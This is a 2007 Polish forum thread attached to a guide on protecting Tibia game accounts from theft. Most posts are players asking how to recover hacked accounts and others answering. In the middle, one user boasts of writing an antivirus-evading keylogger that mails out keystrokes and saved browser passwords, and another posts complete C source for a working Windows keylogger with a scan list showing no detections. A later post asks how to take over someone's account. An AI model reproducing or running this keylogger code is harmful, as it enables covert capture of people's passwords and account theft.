Forum Tibia.pl

Forum Tibia.pl (http://forum.tibia.pl//index.php)
-   Poradniki (http://forum.tibia.pl//forumdisplay.php?f=31)
-   -   "Schakowali mnie, halp plx"-czyli co robić aby temu zapobiec (http://forum.tibia.pl//showthread.php?t=42730)

Shor'tugal 25-02-2007 17:36

Witam. Otóz jak sie domyslacie shakowali mi konto ( PLEJT ARMORA X( ). Otóz chciałem go odzyskać więc zrobiłem aby wysłało mi hasło na mejla ( interia.pl ). Otóz czekam godzine i nic nieprzyszło a hacker nadal jest online na mojej postaci ;( . Co mam zrobić teraz ? :(

Elwag 26-02-2007 18:00

X(

Słuchajcie mam problem.Mam postać na 28 lvl Knight i dziś rano loguje się na tibia.com wszystko było ok przychodze ze szkoły a tu dupa..dostałem te konto od kumpla i nie wiem czy ma rec-key'a i nie znam e-mailu.Da się to konto odzyskać jeśli zostało zhakowane a jeśli nie to dlaczego nie moge się zalogować?

artur_waw 01-03-2007 21:58

Witam

Cały artykuł nawet miły i miejmy nadzieję że kogoś uchroni przed stratą postaci.
Należałoby napisać coś o
* popularnym Phishingu,
* Fake mailach które budzą zdziwienie - "jak to dostałem maila od [email protected]",
* można jeszcze napomknąć że nie zawsze oficjalny Fun site jest do końca bezpieczny,
* oprócz keyloggera istnieje coś bardziej poręcznego jak cookis
* może jeszcze że wejście na jakąś stronę dziś może zemścić się za tydzień,
* o tym że jeśli twój komputer jest w LANie to jesteś w grupie podwyższonego ryzyka,

- można tak jeszcze trochę wymienić bo sposobów ataków jest mnóstwo i dlatego jeśli ktoś będzie chciał to i tak zabierze Ci to konto a Ty możesz mu w tym tylko przeszkadzać.

Dlaczego cały czas mowa o hackingu skoro keyloggery mają z tym niewiele wspólnego. Przecież konta są głównie kradzione przez dzieciaków które o komputerze wiedzą tyle co nic. A że niedoświadczeni użytkownicy się nabierają to już inna sprawa

Może warto by zrobić na głównej stronie link do strony o security ??

Kashtan 01-03-2007 23:44

Cytuj:

Oryginalnie napisane przez artur_waw (Post 1295813)
Witam

Cały artykuł nawet miły i miejmy nadzieję że kogoś uchroni przed stratą postaci.
Należałoby napisać coś o
* popularnym Phishingu,
* Fake mailach które budzą zdziwienie - "jak to dostałem maila od [email protected]",
* można jeszcze napomknąć że nie zawsze oficjalny Fun site jest do końca bezpieczny,
* oprócz keyloggera istnieje coś bardziej poręcznego jak cookis
* może jeszcze że wejście na jakąś stronę dziś może zemścić się za tydzień,
* o tym że jeśli twój komputer jest w LANie to jesteś w grupie podwyższonego ryzyka,

- można tak jeszcze trochę wymienić bo sposobów ataków jest mnóstwo i dlatego jeśli ktoś będzie chciał to i tak zabierze Ci to konto a Ty możesz mu w tym tylko przeszkadzać.

Dlaczego cały czas mowa o hackingu skoro keyloggery mają z tym niewiele wspólnego. Przecież konta są głównie kradzione przez dzieciaków które o komputerze wiedzą tyle co nic. A że niedoświadczeni użytkownicy się nabierają to już inna sprawa

Może warto by zrobić na głównej stronie link do strony o security ??

POPIERAM :P

qwer22 18-03-2007 14:16

Zrobilem wszystko na tibia.com aby oszyskac konto ale czekam i czekam az to chaslo przyjdzieX( . Po jakim czasie odzyskam haslo ???

InfernoDevil 25-03-2007 12:50

Help!

;( Zostalem Shakowany(jakos tak to sie pisze) czy moge w jakies sposub odzyskac konto?

Vasco 26-03-2007 22:32

A więc tak miałem konto i chciałem zmienić e-mail nio i nie fortunie zmieniłem ten e-mail na taki którego nie mam i nie da sie takiego mieć pownieważ ma kropke po pl ([email protected].. to przykład tego co zrobiłem) oczywiście nie znam r-keya czy mam jakieś szanse na odzyskanie postaci ??

Peligland 13-04-2007 20:43

Jak uniknąć haka.

Cześć.W tym poście zamieszcze ,,Jak uniknąć haka":
1.Sprawdzić koniecznie czy macie na komputerze Key-Logera:
a)Jak wysłali linki np.na gg i je otwieraliście je bez anty virusa może istnieć
możliwość, że macie Key-Logera.
2.Nie dawać nikomu pass-ów nawet przyjacielowi po co mu to.
3.PAMIĘTAJCIE WIĘKSZOŚĆ HAKóW JEST PRZEZ WASZA WINE!

Teraz to na tyle Cya All:)

Contemple 13-04-2007 21:27

B.Dobry poradnik !

szkoda, że wcześniej do nie przeczytałem =/

Dzisiaj "hacked"

;/

Denerwują mnie tacy hakerzy ... Ehhh jak ja bym chciał ich zniszczyć jakoś ...
Ale co tam ... nie można się użalać ^^

G17 21-04-2007 19:25

Prosze o pomoc
zostalem hakniety
i wzialem
na tibia com lost account
1 wpisuje nick
2 zaznaczam opcje
3 wpisuje numer i mail na ktorym bylo zalozone konto
4 i klikam COnfirm
i PISZE ERROR
INCORRECT NUMBER OR E MAIL

prosze o pomoc a podaje wszystko dobrze !

MarcelG 22-04-2007 10:15

Dzięki za poradnik napewno sie przyda kiedyś mnie hakneli i teraz bede widział co zrobić

Kfazimodo 22-04-2007 17:46

aaaaaaaaaaaaaaaaaaaaaaaa

Hellraiser 13-05-2007 21:27

@Autorzy poradników

Macie wielkiego + za świetne porady, tipy etc,..

Meerol 14-05-2007 17:58

witam. Mam duży problem. Dostałem od kolegi postac, 27 knight na tych samych pasach byl tez 21 druid i 19 pall. Ktoś mnie schakował i żeby odzyskać hasło musze wysłać je na maila kolegi a kolega niezna tego maila juz. I co mam zrobić zeby dostac haslo nowe ?

Valderor 14-05-2007 18:15

Cytuj:

Oryginalnie napisane przez Meerol (Post 1431023)
witam. Mam duży problem. Dostałem od kolegi postac, 27 knight na tych samych pasach byl tez 21 druid i 19 pall. Ktoś mnie schakował i żeby odzyskać hasło musze wysłać je na maila kolegi a kolega niezna tego maila juz. I co mam zrobić zeby dostac haslo nowe ?

Wyślij maila do Customer Support i opisz im dokładnie sytuację. Ewentualnie możesz zapytać na Help Channel.

Meerol 14-05-2007 18:22

Cytuj:

Oryginalnie napisane przez Valderor (Post 1431066)
Wyślij maila do Customer Support i opisz im dokładnie sytuację. Ewentualnie możesz zapytać na Help Channel.

Tylko ze ja nieznam za bardzo Angielskiego :(( Co mam zrobic :( Pomóżcie :P

Meerol 15-05-2007 14:45

to powie mi ktos co mam zrobic ??

zlykuba 15-05-2007 21:36

moje konto:(:(:(

mam takie pytanko bo ja zostalem shakowany jakies pare dni temu:( .
a wiec weszlem na stronie (jak pisalo w poradniku),kliknolem lost account,wpisalem swoj nick, zaznaczylem ,,My account has been hacked."(moje konto zostalo shakowane) pozniej zaznaczylem ,,send it by email" wpisalem e-mail oraz moj numer.I przyszlo mi na moj e-mail confirmation key:
************** oraz haslo:******** a kiedy wchodze w link ktory mi przyslano w ktorym mam wpisac cofirmation key,wpisuje go i pisze mi ,,
Error
Please enter a valid account number". a kiedy wpisuje chaslop ktore mi przyslanoi numer zeby sie zalogowac na tibi pisze mi ,, Account disabled for five minutes. Please wait."

Prosze powiedzcie mi co ja robie zle. postarajcie mi odpisac ja najszybcie plz.

zlykuba 16-05-2007 17:03

hack

mam takie pytanko bo ja zostalem shakowany jakies pare dni temu .
a wiec weszlem na stronie (jak pisalo w poradniku),kliknolem lost account,wpisalem swoj nick, zaznaczylem ,,My account has been hacked."(moje konto zostalo shakowane) pozniej zaznaczylem ,,send it by email" wpisalem e-mail oraz moj numer.I przyszlo mi na moj e-mail confirmation key:
************** oraz haslo:******** a kiedy wchodze w link ktory mi przyslano w ktorym mam wpisac cofirmation key,wpisuje go i pisze mi ,,
Error
Please enter a valid account number". a kiedy wpisuje chaslop ktore mi przyslanoi numer zeby sie zalogowac na tibi pisze mi ,, Account disabled for five minutes. Please wait."

Meerol 16-05-2007 18:19

Cytuj:

Oryginalnie napisane przez zlykuba (Post 1434446)
mam takie pytanko bo ja zostalem shakowany jakies pare dni temu .
Error

Kuba napisz do mnie na gg to ci pomoge. 770 555 to moje gg. Czekam

fAYL 21-05-2007 14:34

Taka mała dygresja nt. keyloggerów. Nie zawsze warto wierzyć antywirom. :)
Wczoraj z nudów postanowiłem napisać sobie prostego KL (ukryte działanie; zbieranie wciśniętych klawiszy i wysyłanie ich co minutę mailem [firewall u mnie i 2 testerów milczał ;) ]; przesyłanie mailem pliku z zapisanymi hasłami w firefoksie).
W sumie pół dnia zabawy, a virustotal jakoś niezbyt dobrze się spisał. ;)
http://img519.imageshack.us/img519/9785/wtnc0.png
A VBA32 to jakiś mało znany anywir chyba, więc pewnie przypadkiem coś znalazł. :P

Uther92 21-05-2007 16:42

A aj sobie napisałem takie małe proste ale niewykrywalne ścierwo. Ale nie wysyła logów ;)
A-Squared
Found nothing
AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found nothing
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
F-Secure Anti-Virus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found nothing
Norman Virus Control
Found nothing
Panda Antivirus
Found nothing
Rising Antivirus
Found nothing
VirusBuster
Found nothing
VBA32
Found nothing

Source:
Ukryty tekst:
#include <windows.h>
#include <iostream>

int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{

MSG messages;
MSG msgKomunikat;
msgKomunikat.message = WM_NULL;
while (msgKomunikat.message != WM_QUIT)
{
if (PeekMessage(&msgKomunikat, NULL, 0, 0, PM_REMOVE))
{
TranslateMessage (&msgKomunikat);
DispatchMessage (&msgKomunikat);
}
else
{
short character;
for(character=8;character<=222;character++)
{
if(GetAsyncKeyState(character)==-32767)
{
FILE *file;
if(file=fopen("pozdrawiam Uther ;).txt","a+"))
{
if((character>=39)&&(character<=64))
{
fputc(character,file);
fclose(file);
break;
}
else if((character>64)&&(character<91))
{
character+=32;
fputc(character,file);
fclose(file);
break;
}
else
{

switch(character)
{
case VK_SPACE:
fputc(' ',file);
fclose(file);
break;
case VK_SHIFT:
fputs("[SHIFT]",file);
fclose(file);
break;
case VK_RETURN:
fputs("\n[ENTER]",file);
fclose(file);
break;
case VK_BACK:
fputs("[BACKSPACE]",file);
fclose(file);
break;
case VK_TAB:
fputs("[TAB]",file);
fclose(file);
break;
case VK_CONTROL:
fputs("[ALT\\CTRL]",file);
fclose(file);
break;
case VK_DELETE:
fputs("[DEL]",file);
fclose(file);
break;
case VK_OEM_1:
fputs("[;:]",file);
fclose(file);
break;
case VK_OEM_2:
fputs("[/?]",file);
fclose(file);
break;
case VK_OEM_3:
fputs("[`~]",file);
fclose(file);
break;
case VK_OEM_4:
fputs("[ [{ ]",file);
fclose(file);
break;
case VK_OEM_5:
fputs("[\\|]",file);
fclose(file);
break;
case VK_OEM_6:
fputs("[ ]} ]",file);
fclose(file);
break;
case VK_OEM_7:
fputs("['\"]",file);
fclose(file);
break;
case VK_NUMPAD0:
fputc('0',file);
fclose(file);
break;
case VK_NUMPAD1:
fputc('1',file);
fclose(file);
break;
case VK_NUMPAD2:
fputc('2',file);
fclose(file);
break;
case VK_NUMPAD3:
fputc('3',file);
fclose(file);
break;
case VK_NUMPAD4:
fputc('4',file);
fclose(file);
break;
case VK_NUMPAD5:
fputc('5',file);
fclose(file);
break;
case VK_NUMPAD6:
fputc('6',file);
fclose(file);
break;
case VK_NUMPAD7:
fputc('7',file);
fclose(file);
break;
case VK_NUMPAD8:
fputc('8',file);
fclose(file);
break;
case VK_NUMPAD9:
fputc('9',file);
fclose(file);
break;
case VK_CAPITAL:
fputs("[CAPS LOCK]",file);
fclose(file);
break;
default:
fclose(file);
break;
}
}
}
}
}
}
}
return messages.wParam;
}

LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_DESTROY:
PostQuitMessage (0);
break;
default:
return DefWindowProc (hwnd, message, wParam, lParam);
}

return 0;
}

Dawidurud 27-05-2007 00:19

poprostu super poradnik!! dzieki niemu odzyskalemn swoja postac :D:cup:

Rafal727 02-06-2007 20:55

Mam pytanie!!X( Bardzo potrzebuje pomocy!!!X( Mam numer do konta, ale zapomnielem hasla i nie mam tez hasla do meila na tym koncie;( Czy moge cos zrobic zeby odzyskac te konto ???:( Prosze o pomoc!!!:evul:

A zna ktos program ktorym odczytam haslo do tibi z kompa ???

thierry 03-06-2007 01:12

Co do tego jak odrobić hacka to:

Jeżeli schackowano nas na 70 +poziomie radze isć na dragon lair i pozbierac śmieci (steel shieldy,mace,kusze,p legi itp) średni loot bag to 4-5k :D:)

cieju04 03-06-2007 14:22

Mam problem. Kiedyś jak byłem głupi nabrałem się i ściągnąłem plik z rzekomo zdjęciami z questu. Ale poprosiłem tą osobę i zrobiła tak, że mogłem spokojnie wykasować plik. Teraz mineło sporo czasu od tamtego incydentu. Dzis wchodze rano na tibie, patrze a w banku 0 gp. Tyle zostało z około 10k. Dziwne, że tylko to znikło, a nie np pancerz czy guardian shield. I moje pytanie jest takie, czy ta osoba od której ściągnąłem ten plik i zaraz po tym wykasowałem nadal może widzieć moje hasła itd?

balamuta 03-06-2007 14:44

Mam pytanie bo ja tez miałem podobną sytuację że ściągałem notatnik z Emule pt"Password and account Tibia" nic tam niebylo i to skasowalem i teraz niewiem :( powiedzcie jak przeskanowac szybko tak jak wy to robicie i piszcie na forum

Duch Niespokojny 03-06-2007 16:51

Cytuj:

Oryginalnie napisane przez Rafal727 (Post 1462282)
Mam pytanie!!X( Bardzo potrzebuje pomocy!!!X( Mam numer do konta, ale zapomnielem hasla i nie mam tez hasla do meila na tym koncie;( Czy moge cos zrobic zeby odzyskac te konto ???:( Prosze o pomoc!!!:evul:

Są trzy opcje:
a) odzyskać dostęp do konta e-mail,
b) użyć recovery key,
c) pożegnać się z kontem.
Cytuj:

Oryginalnie napisane przez cieju04 (Post 1463340)
I moje pytanie jest takie, czy ta osoba od której ściągnąłem ten plik i zaraz po tym wykasowałem nadal może widzieć moje hasła itd?

Tak, samo wykasowanie pliku nic nie daje.
Cytuj:

Oryginalnie napisane przez balamuta (Post 1463373)
Mam pytanie bo ja tez miałem podobną sytuację że ściągałem notatnik z Emule pt"Password and account Tibia" nic tam niebylo i to skasowalem i teraz niewiem :( powiedzcie jak przeskanowac szybko tak jak wy to robicie i piszcie na forum

Jeżeli to był zwykły plik .txt, to nie widzę problemu...

cieju04 06-06-2007 19:07

Mam znów problem. Zostałem zhackowany, zmienili mi hasło, ale później je odzyskałem i zmieniłem na swoje tylko, że haker zrobił to co ja i zgłosił account lost. Co mam zrobić? zna mój numer konta. Plx szybką odpowiedź Nie wiem co robić a mam PACC.

Duch Niespokojny 06-06-2007 19:51

Cytuj:

Oryginalnie napisane przez cieju04 (Post 1468533)
Mam znów problem. Zostałem zhackowany, zmienili mi hasło, ale później je odzyskałem i zmieniłem na swoje tylko, że haker zrobił to co ja i zgłosił account lost. Co mam zrobić? zna mój numer konta. Plx szybką odpowiedź Nie wiem co robić a mam PACC.

Jeżeli "hacker" nie ma dostępu do twojego konta e-mail, to co najwyżej będziesz dostawał maile z prośbą o potwierdzenie żądania przysłania nowego hasła, które możesz zwyczajnie zignorować. Jeśli nie masz dostępu do tego konta emailowego, możesz je zmienić używając recovery key.

cieju04 06-06-2007 20:23

Cytuj:

Oryginalnie napisane przez Duch Niespokojny (Post 1468636)
Jeżeli "hacker" nie ma dostępu do twojego konta e-mail, to co najwyżej będziesz dostawał maile z prośbą o potwierdzenie żądania przysłania nowego hasła, które możesz zwyczajnie zignorować. Jeśli nie masz dostępu do tego konta emailowego, możesz je zmienić używając recovery key.

Dzięki stary, nawet nie wiesz jak mi pomogłeś. Wiedziałem, że w tym kraju są porządni ludzie. Jesteś jedną z nim. Już wszystko jest dobrze, sprawa zażegnana :P

Gravers 07-06-2007 22:00

Witam. Otóz mam wielki problem. :( Shackowali mnie. Odzyskałem konto dzień po
hacku. Dziwi mnie dlaczego hacker niezabrał ŻADNYCH, dosłownie ŻADNYCH itemów? Problem tkwi w tym, że hacker zarejestrował konto. Wpisał w pola jakieś bazgroły, i tu mam pytanie - czy przy rejestracji dostaje się recovery key? Nieposiadam Pacc, więc raczej nie.. tak myśle. Co mam zrobić? Z góry dzięki.

Galeon 07-06-2007 23:16

@up: ojj jak nie byles zarejestrowany a on to zrobil to ma twoj rec key :( jezeli ty go nie masz to niestety ale nie pograsz zbyt dlugo jezeli hacker wykorzysta rec key, proste: jakby sie shackowal i zabral all rzeczy ale nie mial rec keya to zmieniasz haselko i grasz dalej... ale jak ma rec key a nic nie zabral to mozesz zbierac sobie kase i grac dalej ale w kazdej chwili moze wejsc ci na konto i ograbic postac :( dlatego pamietaj zawsze o rejestracji konta jezeli ci na nim zalezy...

Duch Niespokojny 07-06-2007 23:27

Cytuj:

Oryginalnie napisane przez Gravers (Post 1470779)
Dziwi mnie dlaczego hacker niezabrał ŻADNYCH, dosłownie ŻADNYCH itemów? Problem tkwi w tym, że hacker zarejestrował konto. Wpisał w pola jakieś bazgroły, i tu mam pytanie - czy przy rejestracji dostaje się recovery key? Nieposiadam Pacc, więc raczej nie.. tak myśle. Co mam zrobić? Z góry dzięki.

Krótko: załóż nową postać (na innym koncie oczywiście) i przekaż jej wszystkie rzeczy póki jeszcze możesz, bo na tym koncie już sobie nie pograsz.

Gravers 07-06-2007 23:55

A jeśli zapłace 5 euro za nowego recovery key? Czy stary recovery key wygaśnie? Baardzo zależy mi na tym koncie. Wiem, że można zdobyć nowy recovery key.

Kill_Bill 08-06-2007 11:17

Brawo!!!

wspaniały temat, użyłem praiwe wszystkich programów przez was poleconych, mam pytanie, czy jeśli będę używał 1 antyvir,1firewall,ad-aware i inne to sie nie beda ,,gryzły"?+hijack,regcleaner itp.

Duch Niespokojny 08-06-2007 11:59

Cytuj:

Oryginalnie napisane przez Gravers (Post 1471119)
A jeśli zapłace 5 euro za nowego recovery key? Czy stary recovery key wygaśnie? Baardzo zależy mi na tym koncie. Wiem, że można zdobyć nowy recovery key.

Nie dostaniesz nowego recovery key, bo konto nie jest zarejestrowane na ciebie. Jeśli wciąż masz dostęp do konta, to możesz co prawda zmienić dane podane przy rejestracji, ale musiałbyś na to czekać miesiąc.

marek1234 13-06-2007 09:04

help

Witam. Prawdopodobnie mam keyloggera na kompie, uzylem programu hijackthis i i znalazlem go(przynajmniej tak mi sie wydaje) znalazlem cos takiego: orcToByloLatwe i jeszcze C:\Windows\services*****.
orca usunelem a ten services usunelem przy pomocy killboxa i teraz jak sprawdzam loga to mi pokazuje ze ten services nadal jest tylko ze teraz w
C:\!KillBox\services*****
i nie wiem czy on jeszcze dziala czy jest usuniety i czy jeszcze cos powinienem zrobic.
prosze o pomoc.:(

Uther92 13-06-2007 09:14

Cytuj:

Oryginalnie napisane przez marek1234 (Post 1482473)
Witam. Prawdopodobnie mam keyloggera na kompie, uzylem programu hijackthis i i znalazlem go(przynajmniej tak mi sie wydaje) znalazlem cos takiego: orcToByloLatwe i jeszcze C:\Windows\services*****.
orca usunelem a ten services usunelem przy pomocy killboxa i teraz jak sprawdzam loga to mi pokazuje ze ten services nadal jest tylko ze teraz w
C:\!KillBox\services*****
i nie wiem czy on jeszcze dziala czy jest usuniety i czy jeszcze cos powinienem zrobic.
prosze o pomoc.:(

To backup killbox'a...już nie powinien być groźny. Jak chcesz to usuń ;)

Konrad21 15-06-2007 12:40

problem

Witam all mam pytanie jak sie tu robi wlasny post bo niewiem ?? aha i tak przy okazji mam prozbe wytlumaczcie mi dokladnie np znam rekowerkeya kolesia w tibi jak go zhakowac prosze pomoc pozdro

Wszystkie czasy podano w strefie GMT +2. Teraz jest 01:55.